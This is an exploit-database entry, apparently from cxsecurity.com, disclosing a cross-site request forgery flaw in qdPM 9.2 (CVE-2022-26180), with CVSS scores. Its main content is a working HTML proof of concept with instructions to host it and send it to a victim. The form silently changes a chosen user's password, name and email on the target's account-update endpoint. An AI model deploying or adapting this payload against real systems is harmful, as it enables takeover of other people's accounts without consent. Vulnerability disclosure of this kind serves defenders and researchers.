qdPM 9.2 Cross Site Request Forgery

2022.04.07
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF) # Google Dork: NA # Date: 03/27/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://qdpm.net/ # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download # Version: 9.2 # Tested on: KALI OS # CVE : CVE-2022-26180 # --------------- Steps to Exploit : 1) Make an HTML file of given POC (Change UserID field Accordingly)and host it. 2) send it to victim. <html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title> <body> <script>history.pushState('', '', '/')</script> <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST"> <input type="hidden" name="sf&#95;method" value="put" /> <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly ---> <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" /> <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" /> <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" /> <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" /> <input type="hidden" name="users&#91;photo&#93;" value="" /> <input type="hidden" name="users&#91;culture&#93;" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top